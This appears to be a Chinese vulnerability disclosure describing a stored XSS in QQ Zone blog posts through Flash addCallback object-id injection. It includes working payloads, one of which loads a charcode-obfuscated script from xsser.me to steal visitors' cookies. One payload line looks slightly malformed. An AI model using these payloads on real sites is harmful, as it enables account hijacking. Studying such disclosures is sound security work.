简要描述:

有些时候,我们拿现成的XSS代码都不行,都被过滤了,那么需要我们对过滤的规则进行一定的判断与猜测。然后针对性的使用一些技巧来适应或者绕过规则。

在本例中,我们以QQ空间/QQ校友的日志功能为例,通过猜测简单的过滤规则,然后使用含有addCallback的flash,来实现了存储型XSS的构造。

详细说明:

1. 前提:本例需在IE9,IE10下进行。



2. 我们乌云上报告的一些已有案例,进行了再次测试。



上例中,提到了QQ空间日志并未对object标签进行有效的过滤。



3. 我们根据此例中的代码对过滤规则进行测试:



<object width="100%" height="100%" align="middle" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" type="application/x-shockwave-flash"><PARAM NAME="Movie" VALUE="http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf"><PARAM NAME="Src" VALUE="http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf"><PARAM NAME="AllowScriptAccess" VALUE="always">





以上的代码,是可以正常提交,并且未过滤的。



<object width="100%" height="100%" align="middle" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" type="application/x-shockwave-flash"><PARAM NAME="Movie" VALUE="http://mysite.com/vphoto.swf"><PARAM NAME="Src" VALUE="http://mysite.com/vphoto.swf"><PARAM NAME="AllowScriptAccess" VALUE="always">





而当swf的域名不是qzs.qq.com时候,代码将会被过滤为以下内容。



<object width="100%" height="100%" align="middle" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" type="application/x-shockwave-flash"><PARAM NAME="AllowScriptAccess" VALUE="always">





即地址被去掉了。



4. 那么我们已知了这个过滤规则, 就有2种绕过的方式。



4.1 找到一个qzs.qq.com域名下存在缺陷的FLASH,然后加以利用。



此方法,已经在 @gainover 的 WooYun: PKAV腾讯专场 - 6. (QQ空间+朋友网)日志功能存储型XSS 有所介绍了。



4.2 利用Flash的addcallback缺陷来构造存储型XSS。



5. 首先说下flash addcallback方法的基本原理。



根据flash sdk 里的源代码,我们可以得到flash addcallback 的源代码中有以下代码。



if ((((activeX == true)) && (!((objectID == null))))){
_evalJS((((("__flash__addCallback(document.getElementById(\"" + objectID) + "\"), \"") + functionName) + "\");"));
};





108.jpg





其中objectID为调用FLASH的HTML标签的ID。functionName则为被JS所调用的函数名称。



6. 当我们有以下代码时:



<object id="aaaa" width="100%" height="100%" align="middle" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" type="application/x-shockwave-flash"><PARAM NAME="Movie" VALUE="http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf"><PARAM NAME="Src" VALUE="http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf"><PARAM NAME="AllowScriptAccess" VALUE="always">





且http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf 中存在一句



ExternalInterface.addCallback("myfunc",funcInFlash);



则有

objectID="aaaa";
functionName="myfunc";





代入上面那句_evalJS中,则有



__flash__addCallback(document.getElementById("aaaa"), "myfunc");





7. 那么我们可以想象一下,如果 aaaa 替换为 aaaa"),alert(1),("



则上面代码变为



__flash__addCallback(document.getElementById("aaaa"),alert(1),(""), "myfunc");





解析:



104.jpg





8. 且FLASH中,确实未对objectID做任何过滤。 基于以上内容,我们可以构建利用代码。



<object id='aaaa"),alert(1),("' width="100%" height="100%" align="middle" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" type="application/x-shockwave-flash"><PARAM NAME="Movie" VALUE="http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf"><PARAM NAME="Src" VALUE="http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf"><PARAM NAME="AllowScriptAccess" VALUE="always">





我们自己用上面这段代码先在自己网站上测试下:



105.jpg





看,果然id里的代码被执行了!



9. 利用以上原理,接着我们在QQ空间里来做测试,至于FLASH么,就是现成的!



虽然这个FLASH里没有缺陷,但是存在addCallback的调用,我们就可以直接用它。



<object width="100%" height="100%" align="middle" id="xsstest1&quot),(function(){if(!window.__x){window.__x=1;window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.String.fromCharCode(104,116,116,112,58,47,47,120,115,115,101,114,46,109,101,47,66,113,112,57,82,121);document.body.appendChild(window.s);}})(),(&quot;" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" type="application /x-shockwave-flash"><PARAM NAME="Movie" VALUE="http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf"><PARAM NAME="Src" VALUE="http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf"><PARAM NAME="AllowScriptAccess" VALUE="always">





发布日志,使用以上代码



106.jpg





10. 当用户访问含有XSS代码的日志后,我们可以在xsser.me查看所记录的cookies内容。



107.jpg